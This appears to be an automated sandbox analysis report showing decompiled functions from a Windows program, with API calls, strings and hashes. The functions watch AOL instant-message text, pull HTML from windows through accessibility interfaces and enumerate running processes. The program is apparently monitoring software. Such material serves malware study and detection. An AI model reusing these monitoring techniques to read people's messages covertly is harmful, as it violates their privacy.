				signed int _t19;
				void* _t27;

				E0043E4E0(0x43fa28, _t27);
				_t19 = 0;
				if( *((intOrPtr*)(_t27 + 8)) == 0 || strncmp( *(_t27 + 0xc), "AOL Child", 9) != 0) {
					_t14 = 0;
				} else {
					_push( *((intOrPtr*)(_t27 + 8)));
					_push(_t27 + 0xc);
					_t17 = E0040FEA7();
					_push("IM To:");
					 *(_t27 - 4) = 0;
					L0043DFD6();
					if(_t17 != 0xffffffff) {
						L5:
						_t19 = 1;
					} else {
						_push(">IM From:");
						L0043DFD6();
						if(_t17 != 0xffffffff) {
							goto L5;
						}
					}
					 *(_t27 - 4) =  *(_t27 - 4) | 0xffffffff;
					L0043DD36();
					_t14 = _t19;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t27 - 0xc));
				return _t14;
			}

0x0040a4c0
0x0040a4c6
0x0040a4cb
0x0040a4e4
0x0040a4e8
0x0040a4e8
0x0040a4ee
0x0040a4ef
0x0040a4f6
0x0040a4fe
0x0040a501
0x0040a509
0x0040a51d
0x0040a51d
0x0040a50b
0x0040a50b
0x0040a513
0x0040a51b
0x00000000
0x00000000
0x0040a51b
0x0040a51f
0x0040a526
0x0040a52b
0x0040a52b
0x0040a531
0x0040a539

APIs

__EH_prolog.LIBCMT ref: 0040A4C0
strncmp.MSVCRT(?,AOL Child,00000009), ref: 0040A4D7
#2764.MFC42(IM To:), ref: 0040A501
#2764.MFC42(>IM From:,IM To:), ref: 0040A513
#800.MFC42(IM To:), ref: 0040A526

Strings

IM To:, xrefs: 0040A4F6
AOL Child, xrefs: 0040A4CF
>IM From:, xrefs: 0040A50B

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2764$#800H_prologstrncmp
String ID: >IM From:$AOL Child$IM To:
API String ID: 687971048-2146893504
Opcode ID: 8db7466b390b1cf740e5e75a3ba9ec6ec5a59381e1fee9490f8d6d5d21952516
Instruction ID: b3b62cd0345b78c1711318b7908591559d21b39a65f22f4f38484eba1d5dfb8d
Opcode Fuzzy Hash: 8db7466b390b1cf740e5e75a3ba9ec6ec5a59381e1fee9490f8d6d5d21952516
Instruction Fuzzy Hash: E5018431500204BBCF20EF60D886A9D7720AB15338F60923FF836661D2E73C9719CA19

Uniqueness

Uniqueness Score: -1.00%

Function 00410B71, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 25
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410B71(struct HINSTANCE__** __ecx) {
				struct HINSTANCE__* _t4;
				struct HINSTANCE__** _t13;

				_t13 = __ecx;
				_t4 = LoadLibraryA("WININET.DLL");
				 *_t13 = _t4;
				if(_t4 != 0) {
					_t13[1] = GetProcAddress(_t4, "InternetGetConnectedState");
					_t13[2] = GetProcAddress( *_t13, "InternetAutodialHangup");
					_t13[3] = GetProcAddress( *_t13, "InternetAttemptConnect");
				}
				return _t13;
			}

0x00410b72
0x00410b79
0x00410b81
0x00410b83
0x00410b99
0x00410ba5
0x00410bac
0x00410baf
0x00410bb3

APIs

LoadLibraryA.KERNEL32(WININET.DLL), ref: 00410B79
GetProcAddress.KERNEL32(00000000,InternetGetConnectedState), ref: 00410B92
GetProcAddress.KERNEL32(?,InternetAutodialHangup), ref: 00410B9E
GetProcAddress.KERNEL32(?,InternetAttemptConnect), ref: 00410BAA

Strings

WININET.DLL, xrefs: 00410B74
InternetGetConnectedState, xrefs: 00410B8C
InternetAttemptConnect, xrefs: 00410BA0
InternetAutodialHangup, xrefs: 00410B94

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: InternetAttemptConnect$InternetAutodialHangup$InternetGetConnectedState$WININET.DLL
API String ID: 2238633743-2055583813
Opcode ID: 5678fb8b73b11e393a7f8f2e9e2517adb259ee0a3a870393ab9af17a2edbf39b
Instruction ID: fbec895e31b84ae0f9bb96512bd8d5310b3b2ecfbf6ea030c8671e5acdcc45b5
Opcode Fuzzy Hash: 5678fb8b73b11e393a7f8f2e9e2517adb259ee0a3a870393ab9af17a2edbf39b
Instruction Fuzzy Hash: B6E01276600300AF97216F6ADC09E16FAE8EE95B52321842FE885D3161D6B4A940CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00424FBF, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 25
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00424FBF() {
				CHAR** _t8;
				CHAR** _t10;
				void* _t17;

				 *((intOrPtr*)(_t17 - 0x28)) =  *((intOrPtr*)(_t17 - 0x14));
				_push("temporary.bmp");
				_t8 = _t17 + 8;
				_push(0x4558c8);
				_push(_t8);
				L0043DE20();
				DeleteFileA( *_t8);
				L0043DD36();
				_push("th_temp.bmp");
				_t10 = _t17 + 8;
				_push(0x4558c8);
				_push(_t10);
				L0043DE20();
				DeleteFileA( *_t10);
				L0043DD36();
				 *0x4558fc =  *0x4558fc & 0x00000000;
				return E00425049;
			}

0x00424fc7
0x00424fca
0x00424fcf
0x00424fd2
0x00424fd3
0x00424fd4
0x00424fe1
0x00424fe6
0x00424feb
0x00424ff0
0x00424ff3
0x00424ff4
0x00424ff5
0x00424ffc
0x00425001
0x00425006
0x00425012

APIs

#924.MFC42(?,004558C8,temporary.bmp), ref: 00424FD4
DeleteFileA.KERNEL32(00000000,?,004558C8,temporary.bmp), ref: 00424FE1
#800.MFC42 ref: 00424FE6
#924.MFC42(?,004558C8,th_temp.bmp), ref: 00424FF5
DeleteFileA.KERNEL32(00000000,?,004558C8,th_temp.bmp), ref: 00424FFC
#800.MFC42 ref: 00425001

Strings

temporary.bmp, xrefs: 00424FCA
th_temp.bmp, xrefs: 00424FEB

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800#924DeleteFile
String ID: temporary.bmp$th_temp.bmp
API String ID: 1881785514-137730247
Opcode ID: eb9bce4a6509e3471cba5f46eea1d1e39a1e8eb1f961e9ca51059d6b3b73d491
Instruction ID: 4a62759221be7de2b31315c70a721f43cf1daaf41852fa5a8627f5c81c95be7f
Opcode Fuzzy Hash: eb9bce4a6509e3471cba5f46eea1d1e39a1e8eb1f961e9ca51059d6b3b73d491
Instruction Fuzzy Hash: 9AF08C75800208AACB10FF51EC05ADE3BA4EF19350F404026F804AB161C738AE08CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004099DC, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 24
libraryloaderregistryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004099DC(intOrPtr* __ecx) {
				struct HINSTANCE__* _t8;
				intOrPtr* _t14;

				_t14 = __ecx;
				E0040FB90(__ecx);
				 *__ecx = 0x4461e4;
				 *((intOrPtr*)(_t14 + 4)) = RegisterWindowMessageA("WM_HTML_GETOBJECT");
				_t8 = LoadLibraryA("OLEACC.DLL");
				 *(_t14 + 8) = _t8;
				 *((intOrPtr*)(_t14 + 0xc)) = GetProcAddress(_t8, "ObjectFromLresult");
				 *((intOrPtr*)(_t14 + 0x10)) = GetProcAddress( *(_t14 + 8), "AccessibleChildren");
				return _t14;
			}

0x004099de
0x004099e0
0x004099ea
0x004099fb
0x004099fe
0x00409a10
0x00409a1a
0x00409a22
0x00409a29

APIs

RegisterWindowMessageA.USER32(WM_HTML_GETOBJECT,?,00000000,0040AC66,?,0040AC49,?,0040FC7F,?,00000000), ref: 004099F0
LoadLibraryA.KERNEL32(OLEACC.DLL,?,0040FC7F,?,00000000), ref: 004099FE
GetProcAddress.KERNEL32(00000000,ObjectFromLresult), ref: 00409A13
GetProcAddress.KERNEL32(?,AccessibleChildren), ref: 00409A20

Strings

AccessibleChildren, xrefs: 00409A15
OLEACC.DLL, xrefs: 004099F6
WM_HTML_GETOBJECT, xrefs: 004099E5
ObjectFromLresult, xrefs: 00409A0A

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: AddressProc$LibraryLoadMessageRegisterWindow
String ID: AccessibleChildren$OLEACC.DLL$ObjectFromLresult$WM_HTML_GETOBJECT
API String ID: 3403540151-1075632032
Opcode ID: 2d6f56728af18d13c2291ab284d291d549b8f829eb7fb3a1c4042d7b2daef0b5
Instruction ID: 67a61ac04c5aeda9984eeab19f7febfff46c15714de567a3e76a348e21701281
Opcode Fuzzy Hash: 2d6f56728af18d13c2291ab284d291d549b8f829eb7fb3a1c4042d7b2daef0b5
Instruction Fuzzy Hash: 85E06D71A00304AFC320AF7AEC0AA06BBE4EE85792311883FE445D3621E7B8E5448F48

Uniqueness

Uniqueness Score: -1.00%

Function 00428C64, Relevance: 13.6, APIs: 9, Instructions: 110
processCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00428C64(void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v280;
				intOrPtr _v300;
				intOrPtr _v308;
				void _v312;
				void* _v316;
				void _v860;
				char _v864;
				char _v1116;
				void* _t36;
				void* _t43;
				unsigned int _t53;
				long* _t62;
				signed int _t63;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t78;

				if(E00428A6B() == 0) {
					_t63 = 0x49;
					_v316 = 0;
					memset( &_v312, 0, _t63 << 2);
					_t77 = _t76 + 0xc;
					_t36 = CreateToolhelp32Snapshot(2, 0);
					_t74 = _t36;
					if(_t74 == 0xffffffff) {
						L17:
						return _t36;
					}
					_v316 = 0x128;
					if(Process32First(_t74,  &_v316) == 0) {
						L16:
						return CloseHandle(_t74);
					}
					_v864 = 0;
					memset( &_v860, 0, 0x88 << 2);
					_t78 = _t77 + 0xc;
					do {
						_t43 = E004288B3(_v308, _v300,  &_v864, 0x224);
						_t78 = _t78 + 0x10;
						if(_t43 != 0) {
							E004283A6(_a4,  &_v280);
						}
					} while (Process32Next(_t74,  &_v316) != 0);
					goto L16;
				}
				_t36 =  *0x455bb0( &_v1116, 0x320,  &_v12);
				if(_t36 == 0) {
					goto L17;
				}
				_v8 = _v8 & 0x00000000;
				if((_v12 & 0xfffffffc) <= 0) {
					goto L17;
				} else {
					_t62 =  &_v1116;
					do {
						_t75 = OpenProcess(0x410, 0,  *_t62);
						if(_t75 > 0) {
							_push( &_v20);
							_push(4);
							_push( &_v16);
							_push(_t75);
							if( *0x455bac() != 0) {
								_push(0x104);
								_push( &_v280);
								_push(_v16);
								_push(_t75);
								if( *0x455ba8() > 0) {
									E004283A6(_a4,  &_v280);
								}
							}
						}
						CloseHandle(_t75);
						_v8 = _v8 + 1;
						_t53 = _v12 >> 2;
						_t62 =  &(_t62[1]);
					} while (_v8 < _t53);
					return _t53;
				}
			}

0x00428c77
0x00428d28
0x00428d31
0x00428d3a
0x00428d3a
0x00428d3c
0x00428d42
0x00428d47
0x00428dca
0x00428dca
0x00428dca
0x00428d4f
0x00428d63
0x00428dbf
0x00000000
0x00428dc0
0x00428d72
0x00428d78
0x00428d78
0x00428d7a
0x00428d92
0x00428d97
0x00428d9c
0x00428da8
0x00428da8
0x00428dbb
0x00000000
0x00428d7a
0x00428c8d
0x00428c95
0x00000000
0x00000000
0x00428c9b
0x00428ca6
0x00000000
0x00428cac
0x00428cb2
0x00428cb8
0x00428cc7
0x00428ccb
0x00428cd0
0x00428cd4
0x00428cd6
0x00428cd7
0x00428ce0
0x00428ce8
0x00428ced
0x00428cee
0x00428cf1
0x00428cfa
0x00428d06
0x00428d06
0x00428cfa
0x00428ce0
0x00428d0c
0x00428d11
0x00428d14
0x00428d17
0x00428d1a
0x00000000
0x00428cb8

APIs

Part of subcall function 00428A6B: GetVersionExA.KERNEL32(?), ref: 00428A85

EnumProcesses.PSAPI(?,00000320,?), ref: 00428C8D
OpenProcess.KERNEL32(00000410,00000000,?), ref: 00428CC1
EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00428CD8
GetModuleFileNameExA.PSAPI(00000000,?,?,00000104), ref: 00428CF2

Part of subcall function 004283A6: #823.MFC42(?,?,00000000,00428DAD,?), ref: 004283BE
Part of subcall function 004283A6: memcpy.MSVCRT ref: 004283D5
Part of subcall function 004283A6: #825.MFC42(?,?,00000000,00428DAD,?), ref: 004283E0
Part of subcall function 004283A6: strlen.MSVCRT ref: 004283F4
Part of subcall function 004283A6: #823.MFC42(00000001,00428DAD,00000000,00428DAD,?), ref: 004283FB
Part of subcall function 004283A6: strcpy.MSVCRT(?,00428DAD,00000001,00428DAD,00000000,00428DAD,?), ref: 00428416

CloseHandle.KERNEL32(00000000), ref: 00428D0C
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00428D3C
Process32First.KERNEL32(00000000,?), ref: 00428D5B
Process32Next.KERNEL32(00000000,00000128), ref: 00428DB5
CloseHandle.KERNEL32(00000000), ref: 00428DC0

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #823CloseEnumHandleProcessProcess32$#825CreateFileFirstModuleModulesNameNextOpenProcessesSnapshotToolhelp32Versionmemcpystrcpystrlen
String ID:
API String ID: 2808399935-0
Opcode ID: b542e01e4dbfdb1c792924314c236e6a63cfb5aca8e9845f1cd03be2880c5656
Instruction ID: aed8b7ee01ba0d2c859e0179e6b0f3515664f5e8f4bc73c22d3204cadf6d76ab
Opcode Fuzzy Hash: b542e01e4dbfdb1c792924314c236e6a63cfb5aca8e9845f1cd03be2880c5656
Instruction Fuzzy Hash: 94418671A01628ABDB219B60EC44BEE77BCEF14755F4001AAF605E21D1DF34DB498B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041B45F, Relevance: 13.6, APIs: 9, Instructions: 85
windowCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041B45F(void* __ecx) {
				void* __esi;
				void* _t13;
				intOrPtr _t23;
				intOrPtr _t26;
				void* _t30;
				void* _t46;

				_t46 = __ecx;
				L0043DF94();
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(__ecx);
				_push(0x468);
				L00404F47(_t13, __ecx + 0x64, __ecx);
				_push( *((intOrPtr*)(_t46 + 0x60)) + 0x369);
				_push(0x469);
				L0043E06C();
				_push( *((intOrPtr*)(_t46 + 0x60)) + 0x469);
				_push(0x433);
				L0043E06C();
				_push( *((intOrPtr*)(_t46 + 0x60)) + 0x4e9);
				_push(0x469);
				L0043E06C();
				_push( *((intOrPtr*)(_t46 + 0x60)) + 0x569);
				_push(0x435);
				L0043E06C();
				_t23 =  *((intOrPtr*)(_t46 + 0x60));
				_push(0);
				_push( *((intOrPtr*)(_t23 + 0x106c)));
				_push(0x46a);
				L0043E2E8();
				_push(0x434);
				L0043E066();
				SendMessageA( *(_t23 + 0x20), 0xcc, 0x2a, 0);
				_t45 = _t46 + 0xb8;
				E0040CF63(_t46 + 0xb8, 0x323232, 1);
				if(_t46 != 0) {
					_t26 =  *((intOrPtr*)(_t46 + 0x20));
				} else {
					_t26 = 0;
				}
				E0040CF2E(_t45, 1, 0x4550cc, 0, 0, 0, 0x5a2, _t26);
				_push( *( *((intOrPtr*)(_t46 + 0x60)) + 0x368) & 0x000000ff);
				_push(0x421);
				L0043DF82();
				_t30 = 1;
				return _t30;
			}

0x0041b462
0x0041b464
0x0041b469
0x0041b46b
0x0041b470
0x0041b475
0x0041b47a
0x0041b47b
0x0041b483
0x0041b497
0x0041b498
0x0041b499
0x0041b4a5
0x0041b4a6
0x0041b4ab
0x0041b4bd
0x0041b4be
0x0041b4bf
0x0041b4ce
0x0041b4cf
0x0041b4d4
0x0041b4d9
0x0041b4de
0x0041b4e1
0x0041b4e7
0x0041b4ec
0x0041b4f1
0x0041b4f4
0x0041b504
0x0041b50a
0x0041b519
0x0041b520
0x0041b526
0x0041b522
0x0041b522
0x0041b522
0x0041b53b
0x0041b54c
0x0041b54d
0x0041b552
0x0041b559
0x0041b55d

APIs

#4710.MFC42 ref: 0041B464
#5953.MFC42(00000469,?,?,00EFEFEF,00010101,00808080,00000001), ref: 0041B499
#5953.MFC42(00000433,?,00000469,?,?,00EFEFEF,00010101,00808080,00000001), ref: 0041B4AB
#5953.MFC42(0000039E,?,00000433,?,00000469,?,?,00EFEFEF,00010101,00808080,00000001), ref: 0041B4BF
#5953.MFC42(00000435,?,0000039E,?,00000433,?,00000469,?,?,00EFEFEF,00010101,00808080,00000001), ref: 0041B4D4
#5951.MFC42(0000046A,?,00000000,00000435,?,0000039E,?,00000433,?,00000469,?,?,00EFEFEF,00010101,00808080,00000001), ref: 0041B4EC
#3092.MFC42(0000039E,0000046A,?,00000000,00000435,?,0000039E,?,00000433,?,00000469,?,?,00EFEFEF,00010101,00808080), ref: 0041B4F4
SendMessageA.USER32(?,000000CC,0000002A,00000000), ref: 0041B504

Part of subcall function 0040CF63: InvalidateRect.USER32(?,00000000,00000001), ref: 0040CF7B

#1779.MFC42(00000421,?,?,00EFEFEF,00010101,00808080,00000001), ref: 0041B552

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #5953$#1779#3092#4710#5951InvalidateMessageRectSend
String ID:
API String ID: 3207811862-0
Opcode ID: 1a05e98cc2e7630ad0c5e935822a11d998d401f9258438ae5f81e07f30a2b9a7
Instruction ID: 4f40fa3593a54995fd56effb57fa448d05171b26be719667a4c3e4e36b72b4ff
Opcode Fuzzy Hash: 1a05e98cc2e7630ad0c5e935822a11d998d401f9258438ae5f81e07f30a2b9a7
Instruction Fuzzy Hash: 9521B6B1340710BFF5246767DCC2FBB769DEB85B08F00041EB681AB3D1CAE99D008669

Uniqueness

Uniqueness Score: -1.00%

Function 0040E323, Relevance: 13.6, APIs: 9, Instructions: 82
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040E323(struct HFONT__* __ecx) {
				void* _t29;
				struct HDC__* _t32;
				struct HDC__* _t33;
				struct HFONT__* _t39;
				intOrPtr _t41;
				void* _t53;
				intOrPtr _t55;
				struct HDC__* _t56;
				int _t58;
				void* _t60;

				E0043E4E0(0x44010c, _t60);
				_t39 = __ecx;
				_t53 = __ecx + 0x64;
				_t58 = 0;
				if(_t53 == 0 ||  *((intOrPtr*)(_t53 + 4)) == 0) {
					E0040E42B(_t39);
				}
				if(_t53 != _t58 &&  *((intOrPtr*)(_t53 + 4)) != _t58) {
					GetClientRect( *(_t39 + 0x20), _t60 - 0x2c);
					L0043E000();
					_t41 =  *((intOrPtr*)(_t60 + 8));
					 *(_t60 - 4) = _t58;
					if(_t41 != _t58) {
						_t32 =  *(_t41 + 4);
					} else {
						_t32 = 0;
					}
					_t33 = CreateCompatibleDC(_t32);
					_push(_t33);
					L0043DFFA();
					if(_t53 != _t58) {
						_t55 =  *((intOrPtr*)(_t53 + 4));
					} else {
						_t55 = 0;
					}
					_push(_t55);
					_push( *(_t60 - 0x18));
					L0043DD84();
					_t56 = _t33;
					asm("sbb eax, eax");
					BitBlt( *(_t41 + 4), _t58, _t58,  *((intOrPtr*)(_t60 - 0x24)) -  *(_t60 - 0x2c),  *((intOrPtr*)(_t60 - 0x20)) -  *((intOrPtr*)(_t60 - 0x28)),  ~(_t60 - 0x1c) &  *(_t60 - 0x18), _t58, _t58, 0xcc0020);
					if(_t56 != _t58) {
						_t58 =  *(_t56 + 4);
					}
					_push(_t58);
					_push( *(_t60 - 0x18));
					L0043DD84();
					 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
					L0043DFF4();
				}
				_t29 = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0xc));
				return _t29;
			}

0x0040e328
0x0040e331
0x0040e335
0x0040e338
0x0040e33c
0x0040e345
0x0040e345
0x0040e34c
0x0040e362
0x0040e36b
0x0040e370
0x0040e373
0x0040e378
0x0040e37e
0x0040e37a
0x0040e37a
0x0040e37a
0x0040e382
0x0040e388
0x0040e38c
0x0040e393
0x0040e399
0x0040e395
0x0040e395
0x0040e395
0x0040e39c
0x0040e39d
0x0040e3a0
0x0040e3b1
0x0040e3b8
0x0040e3cc
0x0040e3d4
0x0040e3d6
0x0040e3d6
0x0040e3d9
0x0040e3da
0x0040e3dd
0x0040e3e2
0x0040e3e9
0x0040e3e9
0x0040e3f3
0x0040e3f7
0x0040e3ff

APIs

__EH_prolog.LIBCMT ref: 0040E328
GetClientRect.USER32 ref: 0040E362
#323.MFC42 ref: 0040E36B
